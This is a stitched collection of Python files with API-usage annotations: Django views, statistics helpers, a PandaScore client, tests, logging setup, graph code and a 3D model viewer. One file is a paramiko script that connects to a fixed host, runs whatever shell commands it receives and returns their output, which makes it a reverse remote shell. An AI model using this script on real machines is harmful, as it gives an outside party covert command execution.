class AccessCreateView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, CreateView):
permission_required = 'controllerApp.add_access'
model = Access
form_class = CrateAccessForm
template_name = 'access/new.html'
success_message = '%(field)s - criado com sucesso'
success_url = reverse_lazy('access_index')
def get_context_data(self, **kwargs):
context = super(AccessCreateView, self).get_context_data(**kwargs)
context['page_name'] = 'Acessos'
context['menu_access'] = 'active'
return context
def get_success_message(self, cleaned_data):
return self.success_message % dict(
cleaned_data,
field=self.object.plate,
)
def form_valid(self, form):
self.object = form.save()
self.object.isCreatedManual = True
plate = self.object.plate
vehicle = self.object.vehicle
if (vehicle and int(vehicle.pk) > 0) and not plate:
plate = vehicle.plate
self.object.plate = plate.upper()
self.object.save()
return super(AccessCreateView, self).form_valid(form)
def get_initial(self):
entrance = datetime.now()
return {
'entrance': entrance,
}
class AccessUpdateView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, UpdateView):
permission_required = 'controllerApp.change_access'
model = Access
form_class = AccessForm
template_name = 'access/edit.html'
success_message = '%(field)s - editado com sucesso'
success_url = reverse_lazy('access_index')
def get_context_data(self, **kwargs):
context = super(AccessUpdateView, self).get_context_data(**kwargs)
context['page_name'] = 'Acessos'
context['menu_access'] = 'active'
return context
def form_valid(self, form):
self.object = form.save()
self.object.isUpdatedManual = True
plate = self.object.plate
vehicle = self.object.vehicle
if (vehicle and int(vehicle.pk) > 0) and not plate:
plate = vehicle.plate
self.object.plate = plate.upper()
self.object.save()
return super(AccessUpdateView, self).form_valid(form)
def get_success_message(self, cleaned_data):
return self.success_message % dict(
field=self.object.plate,
)
|
[
"accessApp.repository.VehicleRepository.get_query_filter",
"accessApp.repository.AccessRepository.get_context_today",
"accessApp.repository.AccessRepository.get_query_filter",
"steller.prints.printPdf",
"accessApp.repository.VehicleRepository.get_context",
"django.urls.reverse_lazy",
"steller.exports.exportXlsx",
"accessApp.repository.AccessRepository.get_query_today",
"accessApp.repository.VehicleRepository.get_query_filter_export",
"accessApp.repository.AccessRepository.get_context_not_exit",
"accessApp.repository.AccessRepository.get_context",
"django.contrib.messages.success",
"accessApp.repository.AccessRepository.get_query_not_exit",
"datetime.datetime.now",
"accessApp.repository.AccessRepository.get_query_export"
] |
[((1382, 1432), 'accessApp.repository.VehicleRepository.get_query_filter_export', 'VehicleRepository.get_query_filter_export', (['request'], {}), '(request)\n', (1423, 1432), False, 'from accessApp.repository import VehicleRepository\n'), ((1495, 1541), 'steller.exports.exportXlsx', 'exportXlsx', (['model', 'filename', 'queryset', 'columns'], {}), '(model, filename, queryset, columns)\n', (1505, 1541), False, 'from steller.exports import exportXlsx\n'), ((1624, 1667), 'accessApp.repository.VehicleRepository.get_query_filter', 'VehicleRepository.get_query_filter', (['request'], {}), '(request)\n', (1658, 1667), False, 'from accessApp.repository import VehicleRepository\n'), ((1749, 1796), 'steller.prints.printPdf', 'printPdf', (['request', 'filename', 'queryset', 'template'], {}), '(request, filename, queryset, template)\n', (1757, 1796), False, 'from steller.prints import printPdf\n'), ((2113, 2142), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""vehicle_index"""'], {}), "('vehicle_index')\n", (2125, 2142), False, 'from django.urls import reverse_lazy\n'), ((3096, 3125), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""vehicle_index"""'], {}), "('vehicle_index')\n", (3108, 3125), False, 'from django.urls import reverse_lazy\n'), ((3757, 3786), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""vehicle_index"""'], {}), "('vehicle_index')\n", (3769, 3786), False, 'from django.urls import reverse_lazy\n'), ((5449, 5491), 'accessApp.repository.AccessRepository.get_query_export', 'AccessRepository.get_query_export', (['request'], {}), '(request)\n', (5482, 5491), False, 'from accessApp.repository import AccessRepository\n'), ((5564, 5610), 'steller.exports.exportXlsx', 'exportXlsx', (['model', 'filename', 'queryset', 'columns'], {}), '(model, filename, queryset, columns)\n', (5574, 5610), False, 'from steller.exports import exportXlsx\n'), ((5691, 5733), 'accessApp.repository.AccessRepository.get_query_filter', 'AccessRepository.get_query_filter', (['request'], {}), 
'(request)\n', (5724, 5733), False, 'from accessApp.repository import AccessRepository\n'), ((5813, 5860), 'steller.prints.printPdf', 'printPdf', (['request', 'filename', 'queryset', 'template'], {}), '(request, filename, queryset, template)\n', (5821, 5860), False, 'from steller.prints import printPdf\n'), ((6181, 6209), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""access_index"""'], {}), "('access_index')\n", (6193, 6209), False, 'from django.urls import reverse_lazy\n'), ((7451, 7479), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""access_index"""'], {}), "('access_index')\n", (7463, 7479), False, 'from django.urls import reverse_lazy\n'), ((1046, 1094), 'accessApp.repository.VehicleRepository.get_query_filter', 'VehicleRepository.get_query_filter', (['self.request'], {}), '(self.request)\n', (1080, 1094), False, 'from accessApp.repository import VehicleRepository\n'), ((1183, 1235), 'accessApp.repository.VehicleRepository.get_context', 'VehicleRepository.get_context', (['self', 'VehicleListView'], {}), '(self, VehicleListView)\n', (1212, 1235), False, 'from accessApp.repository import VehicleRepository\n'), ((3995, 4047), 'django.contrib.messages.success', 'messages.success', (['self.request', 'self.success_message'], {}), '(self.request, self.success_message)\n', (4011, 4047), False, 'from django.contrib import messages\n'), ((4317, 4364), 'accessApp.repository.AccessRepository.get_query_filter', 'AccessRepository.get_query_filter', (['self.request'], {}), '(self.request)\n', (4350, 4364), False, 'from accessApp.repository import AccessRepository\n'), ((4453, 4503), 'accessApp.repository.AccessRepository.get_context', 'AccessRepository.get_context', (['self', 'AccessListView'], {}), '(self, AccessListView)\n', (4481, 4503), False, 'from accessApp.repository import AccessRepository\n'), ((4716, 4750), 'accessApp.repository.AccessRepository.get_query_today', 'AccessRepository.get_query_today', ([], {}), '()\n', (4748, 4750), False, 'from 
accessApp.repository import AccessRepository\n'), ((4839, 4900), 'accessApp.repository.AccessRepository.get_context_today', 'AccessRepository.get_context_today', (['self', 'AccessTodayListView'], {}), '(self, AccessTodayListView)\n', (4873, 4900), False, 'from accessApp.repository import AccessRepository\n'), ((5115, 5152), 'accessApp.repository.AccessRepository.get_query_not_exit', 'AccessRepository.get_query_not_exit', ([], {}), '()\n', (5150, 5152), False, 'from accessApp.repository import AccessRepository\n'), ((5241, 5307), 'accessApp.repository.AccessRepository.get_context_not_exit', 'AccessRepository.get_context_not_exit', (['self', 'AccessNotExitListView'], {}), '(self, AccessNotExitListView)\n', (5278, 5307), False, 'from accessApp.repository import AccessRepository\n'), ((7055, 7069), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (7067, 7069), False, 'from datetime import datetime\n')]
|
import numpy as np
import scipy.stats
from functools import partial
from ..util.math import flattengrid
from ..comp.codata import ILR, close
from .log import Handle
logger = Handle(__name__)
def get_scaler(*fs):
"""
Generate a function which will transform columns of an array
based on input functions (e.g. :code:`np.log` will log-transform the x values,
:code:`None, np.log` will log-transform the y values but not the x).
Parameters
------------
fs
A series of functions to apply to subsequent axes of an array.
"""
def scaler(arr, fs=fs):
A = arr.copy()
for ix, f in enumerate(fs):
if f is not None:
A[:, ix] = f(A[:, ix])
return A
return partial(scaler, fs=fs)
def sample_kde(data, samples, renorm=False, transform=lambda x: x, bw_method=None):
"""
Sample a Kernel Density Estimate at points or a grid defined.
Parameters
------------
data : :class:`numpy.ndarray`
Source data to estimate the kernel density estimate; observations should be
in rows (:code:`npoints, ndim`).
samples : :class:`numpy.ndarray`
Coordinates to sample the KDE estimate at (:code:`npoints, ndim`).
transform
Transformation used prior to kernel density estimate.
bw_method : :class:`str`, :class:`float`, callable
Method used to calculate the estimator bandwidth.
See :func:`scipy.stats.kde.gaussian_kde`.
Returns
----------
:class:`numpy.ndarray`
"""
# check shape info first
data = np.atleast_2d(data)
if data.shape[0] == 1: # single row which should be a column
logger.debug("Transposing data row to column format for KDE.")
data = data.T
tdata = transform(data)
tdata = tdata[np.isfinite(tdata).all(axis=1), :] # filter rows with nans
K = scipy.stats.gaussian_kde(tdata.T, bw_method=bw_method)
if isinstance(samples, list) and isinstance(samples[0], np.ndarray): # meshgrid
logger.debug("Sampling with meshgrid.")
zshape = samples[0].shape
ksamples = transform(flattengrid(samples))
else:
zshape = samples.shape[0]
ksamples = transform(samples)
# ensures shape is fine even if row is passed
ksamples = ksamples.reshape(-1, tdata.shape[1])
# samples shouldnt typically contain nans
# ksamples = ksamples[np.isfinite(ksamples).all(axis=1), :]
if not tdata.shape[1] == ksamples.shape[1]:
logger.warn("Dimensions of data and samples do not match.")
zi = K(ksamples.T)
zi = zi.reshape(zshape)
if renorm:
logger.debug("Normalising KDE sample.")
zi = zi / np.nanmax(zi)
return zi
def sample_ternary_kde(data, samples, transform=ILR):
"""
Sample a Kernel Density Estimate in ternary space points or a grid defined by
samples.
Parameters
------------
data : :class:`numpy.ndarray`
Source data to estimate the kernel density estimate (:code:`npoints, ndim`).
samples : :class:`numpy.ndarray`
Coordinates to sample the KDE estimate at (:code:`npoints, ndim`)..
transform
Log-transformation used prior to kernel density estimate.
Returns
----------
:class:`numpy.ndarray`
"""
return sample_kde(data, samples, transform=lambda x: transform(close(x)))
def lognorm_to_norm(mu, s):
"""
Calculate mean and variance for a normal random variable from the lognormal
parameters :code:`mu` and :code:`s`.
Parameters
-----------
mu : :class:`float`
Parameter :code:`mu` for the lognormal distribution.
s : :class:`float`
:code:`sigma` for the lognormal distribution.
Returns
--------
mean : :class:`float`
Mean of the normal distribution.
sigma : :class:`float`
Variance of the normal distribution.
"""
mean = np.exp(mu + 0.5 * s ** 2)
variance = (np.exp(s ** 2) - 1) * np.exp(2 * mu + s ** 2)
return mean, np.sqrt(variance)
def norm_to_lognorm(mean, sigma, exp=True):
"""
Calculate :code:`mu` and :code:`sigma` parameters for a lognormal random variable
with a given mean and variance. Lognormal with parameters
:code:`mean` and :code:`sigma`.
Parameters
-----------
mean : :class:`float`
Mean of the normal distribution.
sigma : :class:`float`
:code:`sigma` of the normal distribution.
exp : :class:`bool`
If using the :mod:`scipy.stats` parameterisation; this uses
:code:`scale = np.exp(mu)`.
Returns
--------
mu : :class:`float`
Parameter :code:`mu` for the lognormal distribution.
s : :class:`float`
:code:`sigma` of the lognormal distribution.
"""
mu = np.log(mean / np.sqrt(1 + sigma ** 2 / (mean ** 2)))
v = np.log(1 + sigma ** 2 / (mean ** 2))
if exp: # scipy parameterisation of lognormal uses scale = np.exp(mu) !
mu = np.exp(mu)
return mu, np.sqrt(v)
|
[
"numpy.atleast_2d",
"functools.partial",
"numpy.log",
"numpy.isfinite",
"numpy.exp",
"numpy.nanmax",
"numpy.sqrt"
] |
[((749, 771), 'functools.partial', 'partial', (['scaler'], {'fs': 'fs'}), '(scaler, fs=fs)\n', (756, 771), False, 'from functools import partial\n'), ((1578, 1597), 'numpy.atleast_2d', 'np.atleast_2d', (['data'], {}), '(data)\n', (1591, 1597), True, 'import numpy as np\n'), ((3903, 3928), 'numpy.exp', 'np.exp', (['(mu + 0.5 * s ** 2)'], {}), '(mu + 0.5 * s ** 2)\n', (3909, 3928), True, 'import numpy as np\n'), ((4833, 4867), 'numpy.log', 'np.log', (['(1 + sigma ** 2 / mean ** 2)'], {}), '(1 + sigma ** 2 / mean ** 2)\n', (4839, 4867), True, 'import numpy as np\n'), ((3967, 3990), 'numpy.exp', 'np.exp', (['(2 * mu + s ** 2)'], {}), '(2 * mu + s ** 2)\n', (3973, 3990), True, 'import numpy as np\n'), ((4008, 4025), 'numpy.sqrt', 'np.sqrt', (['variance'], {}), '(variance)\n', (4015, 4025), True, 'import numpy as np\n'), ((4960, 4970), 'numpy.exp', 'np.exp', (['mu'], {}), '(mu)\n', (4966, 4970), True, 'import numpy as np\n'), ((4986, 4996), 'numpy.sqrt', 'np.sqrt', (['v'], {}), '(v)\n', (4993, 4996), True, 'import numpy as np\n'), ((2692, 2705), 'numpy.nanmax', 'np.nanmax', (['zi'], {}), '(zi)\n', (2701, 2705), True, 'import numpy as np\n'), ((3945, 3959), 'numpy.exp', 'np.exp', (['(s ** 2)'], {}), '(s ** 2)\n', (3951, 3959), True, 'import numpy as np\n'), ((4786, 4821), 'numpy.sqrt', 'np.sqrt', (['(1 + sigma ** 2 / mean ** 2)'], {}), '(1 + sigma ** 2 / mean ** 2)\n', (4793, 4821), True, 'import numpy as np\n'), ((1804, 1822), 'numpy.isfinite', 'np.isfinite', (['tdata'], {}), '(tdata)\n', (1815, 1822), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*
import numpy as np
a = np.array([2, 0, 1 ,5])
print(a)
print(a[:3])
print(a.min())
# 由小到大排序
a.sort()
print(a)
# 二维矩阵
b = np.array([[1,2,3], [4,5,6]])
print(b*b)
|
[
"numpy.array"
] |
[((47, 69), 'numpy.array', 'np.array', (['[2, 0, 1, 5]'], {}), '([2, 0, 1, 5])\n', (55, 69), True, 'import numpy as np\n'), ((149, 181), 'numpy.array', 'np.array', (['[[1, 2, 3], [4, 5, 6]]'], {}), '([[1, 2, 3], [4, 5, 6]])\n', (157, 181), True, 'import numpy as np\n')]
|
import PandaScore
import Processing
from settings import CONFIG, SECRETS
from data import DATA
# def main():
# ps = PandaScore.PandaScoreAPIClient(SECRETS.PS_API_KEY, CONFIG.PS_CONFIG)
# series = ps.get_running_series()
#
# html = Processing.generate_html_from_series(series)
#
# return html
def main():
ps = PandaScore.PandaScoreAPIClient(SECRETS.PS_API_KEY, CONFIG.PS_CONFIG)
leagues_by_videogame = {}
for requested_game in CONFIG.GAMES_CONFIG:
try:
g = DATA.GAMES.find_id(requested_game)
except ValueError as e:
print(e)
try:
g = DATA.GAMES.find_name(requested_game)
except ValueError as e:
print(e)
try:
g = DATA.GAMES.find_slug(requested_game)
except ValueError as e:
print(e)
if not g:
raise ValueError(f"Could not find game {requested_game}")
id = g["id"]
leagues_by_videogame[id] = ps.get_leagues_by_game_id_slug(id)
html = Processing.generate_html_from_leagues_by_vg(leagues_by_videogame)
return html
|
[
"data.DATA.GAMES.find_id",
"Processing.generate_html_from_leagues_by_vg",
"data.DATA.GAMES.find_slug",
"PandaScore.PandaScoreAPIClient",
"data.DATA.GAMES.find_name"
] |
[((333, 401), 'PandaScore.PandaScoreAPIClient', 'PandaScore.PandaScoreAPIClient', (['SECRETS.PS_API_KEY', 'CONFIG.PS_CONFIG'], {}), '(SECRETS.PS_API_KEY, CONFIG.PS_CONFIG)\n', (363, 401), False, 'import PandaScore\n'), ((1043, 1108), 'Processing.generate_html_from_leagues_by_vg', 'Processing.generate_html_from_leagues_by_vg', (['leagues_by_videogame'], {}), '(leagues_by_videogame)\n', (1086, 1108), False, 'import Processing\n'), ((510, 544), 'data.DATA.GAMES.find_id', 'DATA.GAMES.find_id', (['requested_game'], {}), '(requested_game)\n', (528, 544), False, 'from data import DATA\n'), ((628, 664), 'data.DATA.GAMES.find_name', 'DATA.GAMES.find_name', (['requested_game'], {}), '(requested_game)\n', (648, 664), False, 'from data import DATA\n'), ((748, 784), 'data.DATA.GAMES.find_slug', 'DATA.GAMES.find_slug', (['requested_game'], {}), '(requested_game)\n', (768, 784), False, 'from data import DATA\n')]
|
import unittest
from numerize import numerize
class TestNumerizeFunc(unittest.TestCase):
def test_numerize(self):
self.assertEqual(numerize(1), "1")
self.assertEqual(numerize(10), "10")
def test_thousand(self):
self.assertEqual(numerize(1000), "1K")
def test_strict(self):
self.assertEqual(numerize(999), "999")
self.assertEqual(numerize(9999), "10.00K")
def test_negative(self):
self.assertEqual(numerize(-1), "-1")
self.assertEqual(numerize(-10), "-10")
self.assertEqual(numerize(-1000), "-1K")
self.assertEqual(numerize(-9999,4), "-9.9990K")
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"numerize.numerize"
] |
[((666, 681), 'unittest.main', 'unittest.main', ([], {}), '()\n', (679, 681), False, 'import unittest\n'), ((143, 154), 'numerize.numerize', 'numerize', (['(1)'], {}), '(1)\n', (151, 154), False, 'from numerize import numerize\n'), ((186, 198), 'numerize.numerize', 'numerize', (['(10)'], {}), '(10)\n', (194, 198), False, 'from numerize import numerize\n'), ((260, 274), 'numerize.numerize', 'numerize', (['(1000)'], {}), '(1000)\n', (268, 274), False, 'from numerize import numerize\n'), ((334, 347), 'numerize.numerize', 'numerize', (['(999)'], {}), '(999)\n', (342, 347), False, 'from numerize import numerize\n'), ((381, 395), 'numerize.numerize', 'numerize', (['(9999)'], {}), '(9999)\n', (389, 395), False, 'from numerize import numerize\n'), ((462, 474), 'numerize.numerize', 'numerize', (['(-1)'], {}), '(-1)\n', (470, 474), False, 'from numerize import numerize\n'), ((507, 520), 'numerize.numerize', 'numerize', (['(-10)'], {}), '(-10)\n', (515, 520), False, 'from numerize import numerize\n'), ((554, 569), 'numerize.numerize', 'numerize', (['(-1000)'], {}), '(-1000)\n', (562, 569), False, 'from numerize import numerize\n'), ((603, 621), 'numerize.numerize', 'numerize', (['(-9999)', '(4)'], {}), '(-9999, 4)\n', (611, 621), False, 'from numerize import numerize\n')]
|
# Generated by Django 2.2.7 on 2020-06-20 04:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('usermgmt', '0013_profile_tags'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='tags',
field=models.ManyToManyField(blank=True, related_name='fav_tags', to='idea.Tag'),
),
]
|
[
"django.db.models.ManyToManyField"
] |
[((330, 404), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'blank': '(True)', 'related_name': '"""fav_tags"""', 'to': '"""idea.Tag"""'}), "(blank=True, related_name='fav_tags', to='idea.Tag')\n", (352, 404), False, 'from django.db import migrations, models\n')]
|
"""
Rival Regions Wrapper
This unofficial API wrapper is an implementation
of some Rival Regions functionalities.
"""
import logging
import pathlib2
from appdirs import user_data_dir
DATA_DIR = user_data_dir("rival_regions_wrapper", "bergc")
pathlib2.Path(DATA_DIR).mkdir(parents=True, exist_ok=True)
# get logger
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.DEBUG)
# create file handler
FILE_HANDLER = logging.FileHandler("{}/output.log".format(DATA_DIR))
FILE_HANDLER.setLevel(logging.DEBUG)
# create console handler
STREAM_HANDLER = logging.StreamHandler()
STREAM_HANDLER.setLevel(logging.INFO)
# create formatter and add it to the handlers
STREAM_FORMATTER = logging.Formatter(
"%(name)s - %(module)s - %(levelname)s - %(message)s"
)
STREAM_HANDLER.setFormatter(STREAM_FORMATTER)
FILE_FORMATTER = logging.Formatter(
"%(asctime)s - %(name)s - %(module)s - %(levelname)s - %(message)s"
)
FILE_HANDLER.setFormatter(FILE_FORMATTER)
# add the handlers to logger
LOGGER.addHandler(STREAM_HANDLER)
LOGGER.addHandler(FILE_HANDLER)
# from .authentication_handler import AuthenticationHandler
# from .middleware import LocalAuthentication, RemoteAuthentication
|
[
"appdirs.user_data_dir",
"logging.StreamHandler",
"logging.Formatter",
"pathlib2.Path",
"logging.getLogger"
] |
[((199, 246), 'appdirs.user_data_dir', 'user_data_dir', (['"""rival_regions_wrapper"""', '"""bergc"""'], {}), "('rival_regions_wrapper', 'bergc')\n", (212, 246), False, 'from appdirs import user_data_dir\n'), ((329, 356), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (346, 356), False, 'import logging\n'), ((560, 583), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (581, 583), False, 'import logging\n'), ((688, 760), 'logging.Formatter', 'logging.Formatter', (['"""%(name)s - %(module)s - %(levelname)s - %(message)s"""'], {}), "('%(name)s - %(module)s - %(levelname)s - %(message)s')\n", (705, 760), False, 'import logging\n'), ((830, 921), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(module)s - %(levelname)s - %(message)s"""'], {}), "(\n '%(asctime)s - %(name)s - %(module)s - %(levelname)s - %(message)s')\n", (847, 921), False, 'import logging\n'), ((247, 270), 'pathlib2.Path', 'pathlib2.Path', (['DATA_DIR'], {}), '(DATA_DIR)\n', (260, 270), False, 'import pathlib2\n')]
|
import paramiko
import subprocess
HOST = '10.10.10.10'
USERNAME = 'test'
PASSWORD = '<PASSWORD>'
PORT = 2022
run = True
while run == True:
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(HOST, port=PORT, username=USERNAME, password=PASSWORD, compress=True)
chan = client.get_transport().open_session()
chan.send('Command Shell Open')
while True:
command = chan.recv(1024).decode()
if command == 'exit':
run = False
client.close()
break
elif command == 'reset':
run = True
client.close()
break
else:
try:
process = subprocess.run(command, shell=True, capture_output=True, text=True)
if str(process.stderr).startswith("/bin/sh:"):
chan.send(str(process.stderr))
cmd = ''
elif str(process.stdout) == "" and str(process.stderr) == "":
chan.send('No data returned')
cmd = ''
elif str(process.stdout) == "":
chan.send(str(process.stderr))
cmd = str(process.stderr)
else:
cmd = str(process.stdout)
try:
chan.send(cmd)
except Exception as e:
chan.send(e)
except subprocess.CalledProcessError as e:
chan.send(e)
client.close()
except:
pass
|
[
"paramiko.AutoAddPolicy",
"subprocess.run",
"paramiko.SSHClient"
] |
[((161, 181), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (179, 181), False, 'import paramiko\n'), ((221, 245), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (243, 245), False, 'import paramiko\n'), ((719, 786), 'subprocess.run', 'subprocess.run', (['command'], {'shell': '(True)', 'capture_output': '(True)', 'text': '(True)'}), '(command, shell=True, capture_output=True, text=True)\n', (733, 786), False, 'import subprocess\n')]
|
import sys
from collections import defaultdict, Counter
from tqdm import tqdm
import nltk
import json
import os
stopwords_file = "stopwords_en.txt"
if not os.path.exists(stopwords_file):
stopwords_file = "../" + stopwords_file
with open(stopwords_file, "r") as f:
stopwords = [each.strip() for each in f.readlines()]
def process_entity_relations(entity_relations_str, disable=False):
# format is ollie.
entity_relations_str = list(entity_relations_str)
entity_relations = list()
for s in tqdm(entity_relations_str, ascii=True, disable=disable):
temp = s[s.find("(") + 1:s.find(")")].split(';')
entity_relations.append(temp)
return entity_relations
def strip(list_of_strings, stem=False):
stemmer = nltk.stem.porter.PorterStemmer()
if stem:
list_of_strings = [" ".join([stemmer.stem(word) for word in each.strip().split()]) for each in list_of_strings]
else:
list_of_strings = [each.strip().lower() for each in list_of_strings]
# list_of_strings = [stemmer.stem(each) for each in list_of_strings if each not in stopwords]
return list_of_strings
class Graph(object):
def __init__(self, file=None, stem=False, disable=False):
self.adj = defaultdict(lambda: defaultdict(set))
self.source_file = file
if file is not None:
self.build(stem=stem, disable=disable)
def save(self, file):
json.dump(self.adj, open(file, "w"))
def load(self, file):
self.source_file = file
self.adj = json.load(open(file, "r"))
def read(self, stem=False, disable=False):
relations = open(self.source_file, "r").readlines()
if not disable:
print("Converting into list of triplets")
relations = process_entity_relations(relations, disable=disable)
if not disable:
print("Stripping")
relations = [strip(entity_relations, stem) for entity_relations in tqdm(relations, ascii=True, disable=disable)]
return relations
def build(self, stem=False, disable=True):
if not disable:
print("Reading and cleaning relations")
relations = self.read(stem=stem, disable=disable)
if not disable:
print("Building Graph")
for entity_relation in tqdm(relations, disable=disable, ascii=True):
if(len(entity_relation) == 3):
subj = entity_relation[0]
pred = entity_relation[1]
obj = entity_relation[2]
self.adj[subj][obj].add(pred)
self.adj[obj][subj].add("rev_" + pred)
del relations
if not disable:
print("Converting sets of edges to lists")
for subj in tqdm(self.adj, disable=disable, ascii=True):
for obj in self.adj[subj]:
self.adj[subj][obj] = list(self.adj[subj][obj])
if not disable:
print("Graph Building Completed")
def dfs(self, start, visited):
st = []
visited[start] = True
st.append(start)
num_of_members = 1
while(len(st) > 0):
top = st.pop()
for key in self.adj[top]:
if not visited[key]:
visited[key] = True
num_of_members += 1
st.append(key)
return num_of_members
def connectedness(self):
visited = defaultdict(lambda: False)
num = []
for key in self.adj:
if not visited[key]:
num.append(self.dfs(key, visited))
components = list(Counter(num).items())
components.sort(key=lambda x: x[0], reverse=True)
return components
def num_nodes(self):
return len(self.adj)
def num_edges(self):
edge = 0
for node in self.adj:
edge += len(self.adj[node])
return edge / 2
# return score
def __repr__(self):
representation = "Number of Nodes: %d \
\nNumber of Edges: %d \
\nComponents: \
\nNodes\tNumber of components \
""" % (self.num_nodes(), self.num_edges())
components = self.connectedness()
for a, b in components:
representation += "\n%d\t%d" % (a, b)
return representation + "\n"
if __name__ == '__main__':
file = sys.argv[1]
stem = sys.argv[2]
stem = True if stem == "True" else False
print(stem)
g = Graph(file, stem)
print(g.num_nodes())
print(g.num_edges())
print(g.connectedness())
|
[
"tqdm.tqdm",
"collections.Counter",
"os.path.exists",
"collections.defaultdict",
"nltk.stem.porter.PorterStemmer"
] |
[((156, 186), 'os.path.exists', 'os.path.exists', (['stopwords_file'], {}), '(stopwords_file)\n', (170, 186), False, 'import os\n'), ((516, 571), 'tqdm.tqdm', 'tqdm', (['entity_relations_str'], {'ascii': '(True)', 'disable': 'disable'}), '(entity_relations_str, ascii=True, disable=disable)\n', (520, 571), False, 'from tqdm import tqdm\n'), ((752, 784), 'nltk.stem.porter.PorterStemmer', 'nltk.stem.porter.PorterStemmer', ([], {}), '()\n', (782, 784), False, 'import nltk\n'), ((2294, 2338), 'tqdm.tqdm', 'tqdm', (['relations'], {'disable': 'disable', 'ascii': '(True)'}), '(relations, disable=disable, ascii=True)\n', (2298, 2338), False, 'from tqdm import tqdm\n'), ((2732, 2775), 'tqdm.tqdm', 'tqdm', (['self.adj'], {'disable': 'disable', 'ascii': '(True)'}), '(self.adj, disable=disable, ascii=True)\n', (2736, 2775), False, 'from tqdm import tqdm\n'), ((3408, 3435), 'collections.defaultdict', 'defaultdict', (['(lambda : False)'], {}), '(lambda : False)\n', (3419, 3435), False, 'from collections import defaultdict, Counter\n'), ((1254, 1270), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (1265, 1270), False, 'from collections import defaultdict, Counter\n'), ((1950, 1994), 'tqdm.tqdm', 'tqdm', (['relations'], {'ascii': '(True)', 'disable': 'disable'}), '(relations, ascii=True, disable=disable)\n', (1954, 1994), False, 'from tqdm import tqdm\n'), ((3591, 3603), 'collections.Counter', 'Counter', (['num'], {}), '(num)\n', (3598, 3603), False, 'from collections import defaultdict, Counter\n')]
|
import sys
from vispy import scene
from vispy.scene import SceneCanvas
from vispy.visuals import transforms
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtCore import *
from PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QGridLayout, QPushButton, QCheckBox, QSlider
#from MyWidget import *
from vispy import io
#from vispy.visuals.filters import Alpha
from vispy.visuals.transforms import STTransform, MatrixTransform, ChainTransform
import numpy as np
from xml.dom.minidom import parse
import pickle
import random
from bvh import Bvh
import trimesh #
from util import *
from myMath import *
#scaleMatDict=pickle.load(open('personalAdjustmentMatrix.pkl','rb'))
personalDict=pickle.load(open('output/personalDict.pkl','rb'))
scaleMatDict=personalDict['scaleMatDict']
headH_headM_personal=personalDict['headH_headM_personal']
######################################################
dataFolder='template/'
objPath=dataFolder+'OBJ/'
#bvhPath=dataFolder+'motion/'
######################################################
appQt = QtWidgets.QApplication(sys.argv)
win = QMainWindow()
win.resize(700, 500)
win.setWindowTitle('Component Tester')
canvas=SceneCanvas()
canvas.create_native()
canvas.native.setParent(win)
canvas.unfreeze()
view=canvas.central_widget.add_view() #add view to the canvas
view.camera='turntable'
view.camera.up='+y'
canvas.freeze()
#transparent surface must come last (order is important)
originAxis=scene.visuals.XYZAxis(parent=view.scene) #axis length=1
print(originAxis.pos)
################ marker set ####################
#markerDict={}
#f=open(objPath+'markerVertex.txt','r')
#markerCount=0
#for line in f.readlines():
# markerName,objName,vertexIndex=line.strip().split(' ')
# objName=objName+'.obj'
# vertexIndex=int(vertexIndex)
# if objName not in markerDict:
# markerDict[objName]=[]
#
# markerDict[objName].append((vertexIndex,markerName,))
# markerCount+=1
#
#f.close()
#print(markerDict.keys())
######################################################
human = parse(dataFolder+"human.xml")
nodes=human.getElementsByTagName('Node')
humanJointPositionList=[]
boxCenterList=[]
for aNode in nodes:
name=aNode.getAttribute('name')
parent=aNode.getAttribute('parent')
body=aNode.getElementsByTagName('Body')[0]
joint=aNode.getElementsByTagName('Joint')[0]
#print(name,parent,body,joint) #ok
mass=body.getAttribute('mass')
size=floatList(body.getAttribute('size')) #*
size*=np.diag(scaleMatDict[name])[:3]
#print(size)
contact=body.getAttribute('contact') #Off or On
obj=body.getAttribute('obj')
bodyT=getTransformationXML(body) #*
jointT=getTransformationXML(joint) #*
#boxCenterList.append(bodyT[0:3,3])
#humanJointPositionList.append(jointT[0:3,3])
modBoxCenter=(scaleMatDict[name]@bodyT[:,3:4])[0:3,0]
bodyT[:3,3]=modBoxCenter
#bodyT rotation should be adjusted a little bit too
#but keeping orientation the same should not be that bad
boxCenterList.append(modBoxCenter)
humanJointPositionList.append((scaleMatDict[name]@jointT[:,3:4])[0:3,0])
#print(bodyT) #ok
#print(jointT) #ok
verts, faces, normals, nothin = io.read_mesh(objPath+obj) #verts preserve the number of vertex but the order is not preserved
verts*=0.01
vertexMod = scaleMatDict[name] @ np.vstack([verts.transpose(),np.ones([1,verts.shape[0]])]) #(4,n)
verts = vertexMod[:3,:].transpose()
objMesh = scene.visuals.Mesh(parent=view.scene,vertices=verts, shading='flat', faces=faces,color=(0.8, 0.8, 0.8,0.2)) #'flat' is much faster than 'smooth', None removes lighting
objMesh.set_gl_state('translucent', cull_face=False,depth_test=False)
aBox=scene.visuals.Box(parent=view.scene,width=size[0],depth=size[1],height=size[2],color=(0.8,0.1,0.1,0.2))
aBox.transform=MatrixTransform(bodyT.transpose()) #transpose to match openGL format
